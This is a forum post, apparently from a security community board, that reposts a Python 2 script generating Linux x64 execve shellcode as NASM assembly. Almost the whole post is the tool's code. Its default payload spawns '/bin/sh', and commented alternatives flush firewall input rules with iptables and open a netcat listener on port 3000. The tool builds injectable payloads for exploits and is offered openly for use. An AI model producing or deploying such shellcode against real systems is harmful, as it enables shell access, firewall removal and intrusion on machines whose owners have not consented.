Jump to content
Fi8sVrs

Linux/x64 Assembly Shellcode Generator

Recommended Posts

  • Active Members

This script is a Linux/x64 assembly shellcode generator.

 

Download: https://dl.packetstormsecurity.net/shellcode/shellcode-generator.txt

 

Mirror:

#!/usr/bin/env python
#
# Features:
#   - Linux shellcode x64 assembly code generation
#   - stack based (smaller payload size)
#   - execve based
#   - supports long commands (meaning bigger than an x64 register - 64 bits)
#   - supports long parameters (meaning bigger than an x64 register - 64 bits)
#   - one command only (execve will alter the current memory proc and when it exits there's no continuation)
#   - supports command with up to 8 parameters
#
# Instructions
#   - requires full path to the command
#   - only one command is supported due to execve transforming the current process into a new one, loosing all previous context (any other instructions that would have been executed)
#   - after having the x64 generated assembly code:
#       - copy paste it into a file (in a Linux environment) - example.nasm
#       - execute:
#           nasm -felf64 example.nasm -o example.o && ld example.o -o example
#
# Author: Andre Lima @0x4ndr3
#   https://pentesterslife.blog
#
########
 
command = "/bin/sh"
#command = "/sbin/iptables -F INPUT"
#command = "/bin/nc -lvp 3000"
#command = "/bin/echo 1 2 3 4 5 6 7 longparamparamparam"
 
def tohex(val, nbits):
    return hex((val + (1 << nbits)) % (1 << nbits))
 
code = ""
code += "global _start\n"
code += "section .text\n"
code += "\n"
code += "_start:\n"
code += "push 59\n"
code += "pop rax\n"
code += "cdq\n"
code += "push rdx\n"
 
params = command.split(' ')
try:
    params.remove('') # in case of multiple spaces in between params in the command - cleanup
except: # it throws an exception if it doesn't finds one
    pass
 
if len(params[0]) % 8 != 0:
    command = "/"*(8-len(params[0])%8) + params[0]
 
iters = len(command)/8 - 1
while iters >= 0:
    block = command[iters*8:iters*8+8]
    code += "mov rbx, 0x" + block[::-1].encode("hex") + "\n"
    code += "push rbx\n"
    iters -= 1
 
code += "push rsp\n"
code += "pop rdi\n"
 
aux_regs = ["r8","r9","r10","r11","r12","r13","r14","r15"]
i = 0
params = params[1:] # remove first element - command itself. we just want the params
if len(params) > len(aux_regs):
    print "More than " + str(len(aux_regs)) + " parameters... Unsupported."
    exit(1)
for p in params:
    code += "push rdx\n"
    if len(p) % 8 != 0:
        p += "\x00"*(8-len(p)%8)
    iters = len(p)/8 -1
    while iters >= 0: # each param
        block = p[iters*8:iters*8+8]
        code += "mov rbx, 0x" + tohex(~int(block[::-1].encode("hex"),16),64)[2:2+16] + "\n"
        code += "not rbx\n"
        code += "push rbx\n"
        iters -= 1
    code += "push rsp\n"
    code += "pop " + aux_regs[i] + "\n"
    i += 1
 
code += "push rdx\n"
code += "push rsp\n"
code += "pop rdx\n"
 
while i>0:
    i -= 1
    code += "push " + aux_regs[i] + "\n"
 
code += "push rdi\n"
code += "push rsp\n"
code += "pop rsi\n"
code += "syscall\n"
 
print code

Source

  • Upvote 1
Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...